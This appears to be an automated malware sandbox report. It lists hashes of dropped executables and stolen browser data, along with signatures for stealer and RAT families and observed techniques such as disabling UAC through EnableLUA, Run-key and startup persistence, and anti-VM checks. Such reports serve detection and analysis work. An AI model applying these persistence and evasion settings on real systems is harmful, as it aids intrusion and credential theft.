SHA256 de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512 d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf

memory/3372-3022-0x0000023F5C530000-0x0000023F5C9C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp1D42.tmp

MD5 328231ff28d796b81f3a948d740390f9
SHA1 a846d6ee7d372650302703bcef37a3d1cc74cf58
SHA256 3c991a7d9d237412de58d8b8e624f3ffc97054bddca0f814a6ec44d5ad89f7ed
SHA512 c137ebca13a36b693b055502ef75fe368f82b2a3c980f2957051ea527ee65dcb12bc72a2d5b538d4d80fd0fbf6c5c6a2821bfe83d990f5489e2eff97c0992bee

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0B750ED6B3120F01D0400662835BF43896F84DA7

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

MD5 9821fa45714f3b4538cc017320f6f7e5
SHA1 5bf0752889cefd64dab0317067d5e593ba32e507
SHA256 fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
SHA512 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

MD5 4c64aec6c5d6a5c50d80decb119b3c78
SHA1 bc97a13e661537be68863667480829e12187a1d7
SHA256 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253
SHA512 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76

C:\Users\Admin\AppData\Local\Temp\a\888.exe

MD5 b6e5859c20c608bf7e23a9b4f8b3b699
SHA1 302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256 bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
SHA512 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c

memory/2920-3148-0x00007FF67FF80000-0x00007FF680410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

MD5 47f6b0028c7d8b03e2915eb90d0d9478
SHA1 abc4adf0b050ccea35496c01f33311b84fba60c6
SHA256 c656d874c62682dd7af9ab4b7001afcc4aab15f3e0bc7cdfd9b3f40c15259e3f
SHA512 ae4e7b9a9f4832fab3fe5c7ad7fc71ae5839fd8469e3cbd2f753592853a441aa89643914eda3838cd72afd6dee029dd29dc43eaf7db3adc989beab43643951a2

memory/5156-4381-0x000001E55BAB0000-0x000001E55C13E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\info.exe

MD5 ca298b43595a13e5bbb25535ead852f7
SHA1 6fc8d0e3d36b245b2eb895f512e171381a96e268
SHA256 0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e
SHA512 8c591cd0693b9516959c6d1c446f5619228021c1e7a95c208c736168cc90bc15dba47aca99aa6349f8e056a5c7f020c34b751d551260f9d3ba491b11cd953cf5

C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp

MD5 7cec98d7beca577470fd4edc6149b094
SHA1 9891fdfe2a9561831a781418701cb3937f8d80f3
SHA256 3c0d754b1c1d0a1b2cf38d116a2198247cc183ac10112c7094df65aab227781a
SHA512 8e9b79fb8f3c66459450e4e6d5788e7769d41ee65ad569de8edbf3254eaa61a5ff51ab453630150f804d53839839f5d25ccf28e93d95a01d69363cbf81f82332

memory/5464-5430-0x0000000000400000-0x000000000197D000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs

MD5 2bc959c8f2f55c1289cc041729578447
SHA1 991e7337a2c5a5a7741240c1e88893cad433fd6b
SHA256 2851e09bb43ffa178d796eedfccf9d7577239911bcaebde5c0a423f844c9e02a
SHA512 3fd2361d7b380420da3da75c99b9fb05402c2dc6b0c89fe81cb9d860e71d96aa23b155bb9d1fd8c21a27fc25c2690f0c73445aea32e2416976f264e76ee880ae

memory/5464-5611-0x0000000000400000-0x000000000197D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\50.exe

MD5 38c56adb21dc68729fcc9b2d97d72ac1
SHA1 c08c6d344aa88b87d7741d4b249dcc937dad0cea
SHA256 7807125f9d53afac3fe1037dd8def3f039cba5f57a170526bdaaf2e0e09365fb
SHA512 c4f5a7fa9013dfe33a89dcca5640f37b5309b5ef354a5518877512bbbdc072ba8bfaebde0da3b55aacf0bdcbb443d368a3f60e91bedea6c1cc754393943ca530

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

MD5 b70651a7c5ec8cc35b9c985a331ffca3
SHA1 8492a85c3122a7cac2058099fb279d36826d1f4d
SHA256 ed9d94e2dfeb610cb43d00e1a9d8eec18547f1bca2f489605f0586969f6cd6d6
SHA512 3819216764b29dad3fabfab42f25f97fb38d0f24b975366426ce3e345092fc446ff13dd93ab73d252ea5f77a7fc055ad251e7017f65d4de09b0c43601b5d3fd5

memory/2584-5734-0x0000000000650000-0x000000000075C000-memory.dmp

memory/2556-5745-0x00000000050F0000-0x0000000005144000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

MD5 a9255b6f4acf2ed0be0f908265865276
SHA1 526591216c42b2ba177fcb927feee22267a2235d
SHA256 3f25f1c33d0711c5cc773b0e7a6793d2ae57e3bf918b176e2fa1afad55a7337a
SHA512 86d6eaf7d07168c3898ef0516bbd60ef0a2f5be097a979deb37cea90c71daff92da311c138d717e4bb542de1dbd88ef1b6f745b9acbfb23456dd59119d556a50

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

MD5 230f75b72d5021a921637929a63cfd79
SHA1 71af2ee3489d49914f7c7fa4e16e8398e97e0fc8
SHA256 a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355
SHA512 3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001

memory/5732-5824-0x000001F6AE0A0000-0x000001F6AE0F2000-memory.dmp

memory/1300-5823-0x00000262874B0000-0x00000262874F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

MD5 6217bdb87132daca22cb3a9a7224b766
SHA1 be9b950b53a8af1b3d537494b0411f663e21ee51
SHA256 49433ad89756ef7d6c091b37770b7bd3d187f5b6f5deb0c0fbcf9ee2b9e13b2e
SHA512 80de596b533656956ec3cda1da0b3ce36c0aa5d19b49b3fce5c854061672cf63ad543daaf9cf6a29a9c8e8b543c3630aab2aaea0dba6bf4f9c0d8214b7fadbe6

C:\Users\Admin\AppData\Local\Temp\tmpEC21.tmp.dat

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpEC20.tmp.dat

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpEBFF.tmp.dat

MD5 2ba42ee03f1c6909ca8a6575bd08257a
SHA1 88b18450a4d9cc88e5f27c8d11c0323f475d1ae6
SHA256 a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd
SHA512 a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035

memory/2572-5891-0x00000000001A0000-0x00000000001B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

MD5 db69b881c533823b0a6cc3457dae6394
SHA1 4b9532efa31c638bcce20cdd2e965ad80f98d87b
SHA256 362d1d060b612cb88ec9a1835f9651b5eff1ef1179711892385c2ab44d826969
SHA512 b9fe75ac47c1aa2c0ba49d648598346a26828e7aa9f572d6aebece94d8d3654d82309af54173278be27f78d4b58db1c3d001cb50596900dee63f4fb9988fb6df

memory/728-5934-0x0000000000EC0000-0x0000000000ED6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

MD5 4d58df8719d488378f0b6462b39d3c63
SHA1 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118
SHA256 ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d
SHA512 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

MD5 2a4ccc3271d73fc4e17d21257ca9ee53
SHA1 931b0016cb82a0eb0fd390ac33bada4e646abae3
SHA256 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4
SHA512 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74

memory/5340-5972-0x0000000000F30000-0x0000000001180000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new

MD5 008a029b0044f4fb3806301138072816
SHA1 586ea27e9e08f170d1dfb4a45e0266ac07b341d8
SHA256 de6c01cd7762eeb1099c58faf94a707663422d43ed63deb84c68385ca4913f63
SHA512 883cff3fe5cbfbddd2bbb5adbcad3e730b6de19c4cf1c6b5c91388a5ef0168cac6d65a74b413e6118e1ee0cf28172c1ffe8d916bf36b39b659c320d2699de5ae

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

MD5 eaef085a8ffd487d1fd11ca17734fb34
SHA1 9354de652245f93cddc2ae7cc548ad9a23027efa
SHA256 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35
SHA512 bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e

memory/5608-6032-0x0000000000010000-0x0000000000260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

MD5 aeb9f8515554be0c7136e03045ee30ac
SHA1 377be750381a4d9bda2208e392c6978ea3baf177
SHA256 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02
SHA512 d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4

memory/5292-6057-0x0000000000CA0000-0x0000000000EF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

MD5 aa7c3909bcc04a969a1605522b581a49
SHA1 e6b0be06c7a8eb57fc578c40369f06360e9d70c9
SHA256 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab
SHA512 f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0

memory/5744-6061-0x0000000000280000-0x0000000000298000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

MD5 d4a8ad6479e437edc9771c114a1dc3ac
SHA1 6e6970fdcefd428dfe7fbd08c3923f69e21e7105
SHA256 a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b
SHA512 de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07

C:\Users\Admin\AppData\Local\44\Process.txt

MD5 98c9e9af730a27bf19a9703132d29bce
SHA1 5f02627db32179ac3edc56005762477743357cfb
SHA256 5000d8dbe0058f08b0e12c9d2af3ad6fb3ff197213ecd4657582e72d81c5a808
SHA512 ad5b013a8136cef7a8e8d407cf7d63e4fbe4b8dd66d6e8d3632bdcdd08c5eadbc3f348c5281724bb07ca1c4639e604e528574113303a9c12905b432c29cbcec5

memory/5608-6429-0x0000000000010000-0x0000000000260000-memory.dmp

memory/1652-6435-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

C:\Users\Admin\AppData\Local\44\Process.txt

MD5 8bb1d3611cdc1c42febe5bb10085e227
SHA1 51c9cb6d2333190ddeb728039f736ff9b2e9c3a0
SHA256 3d3053a0d225433ac405989dd7e4a80dc9b6ee147511bca3c18b56d5c2c09dbb
SHA512 91e7103e121a427b676efb968acf6ef7fbdb99e0dc360e7f973c5ac8358146a510dfc8299201bcc65346d1e79821b4e123697b88d2fb992f2955fc7702213d2b

C:\Users\Admin\AppData\Local\Temp\rascqn.exe

MD5 7353f60b1739074eb17c5f4dddefe239
SHA1 6cbce4a295c163791b60fc23d285e6d84f28ee4c
SHA256 de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
SHA512 bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

memory/4444-6534-0x0000000006280000-0x00000000065D4000-memory.dmp

memory/4280-6545-0x000001406B9A0000-0x000001406B9E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\History

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Local\Temp\Cookies

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\sensitive-files.zip

MD5 35a512d0a0fcd92a78e0a07d2ee5b42f
SHA1 fe53e9ec4832c2e3f2369d1391bdc0af99a9649f
SHA256 2e249f59c06f74e9759aaeeb2cec12a14812f0fb091621accc6f73ddd99912f7
SHA512 a9e9da1404e7a63667c118b02c18a3e35ad72dcacedbdcd3891040e27c4b03fe0b57b632b74ecb58dfa7db6588473f27bd5616d88288cd8bec6e77d5ab8ca536

C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\user_info.txt

MD5 ea1a4b63623b56d3fe7e6f98d57beaa8
SHA1 aa3ede875b64003d3044dc6049ac61521b496008
SHA256 57ee9ce5b0367764d7b23d03e71d2eb2abecbd0a90ae3d16f0c7a4e6e523bd2d
SHA512 259ab6a120a22450c3726dbbfff20544e74ff0a7e894cd6cad4c82a20856a928b3b0574f57e59858783644545daa8268d8a85c87549a5179198b5ee72717a2d2

C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\screen1.png

MD5 122ccdd6af3f4f83664eb7c1878c0d82
SHA1 76710e508cea20e57649d3afb0686eb44fff5208
SHA256 e6a4719de90be014fd62c6237114ba78d1431f12082895e8f82c65e8687d1bdb
SHA512 9c2c3d954528cfb23546a6b20a3f23ae991c842f210f227380eaff5bb7014a4f20eace15ff100fe278a6559d2eef8643bf9cdc3c51b6e03a7523e614af3fafba

C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\Cookies\Chrome_Default_Network.txt

MD5 e531d4f2d5e8f1c28116eed93558eab8
SHA1 c8633f7e6383a00feaa3e4a9570486942267ee86
SHA256 68ef2f26ded177b3efade41f1a03e3a3ee3169c1c62d594bb505123d1ab33183
SHA512 9e29e48c24401cdaa1a1b2c5bce9a7433d91af4b383004875a7961402c4a90bbe69b0de1b9dea9ede3dac6e6da5ced56f899eb91a66e725e0f48d1678d1cd720

C:\Users\Admin\AppData\Local\Temp\tmp5DC3.tmp.dat

MD5 b24f8b8f6cc374ef423424348437ede6
SHA1 eff0bcd8ae39f065d09a0b75de919093302646d3
SHA256 14d3ad79b4ce62e53ec83a469cdd0a81763311709df8819301827a9671f67092
SHA512 6a61771c7f3688dc16a2ac8d25b79bbb659444842e7fc7eb62d697b6061d5bba78b93149a653dd89ffa3bd8f21fe8d0c0371c8382cb5decb07ff31c4556597ad

C:\Users\Admin\AppData\Local\Temp\tmp5DC2.tmp.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-12 18:19

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

123s

Max time network

301s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RMS

trojan rat rms

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5316 created 5204 N/A C:\Windows\system32\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 5620 created 3200 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\schtasks.exe
PID 5204 created 4012 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
PID 6732 created 2080 N/A N/A C:\Windows\System32\dllhost.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
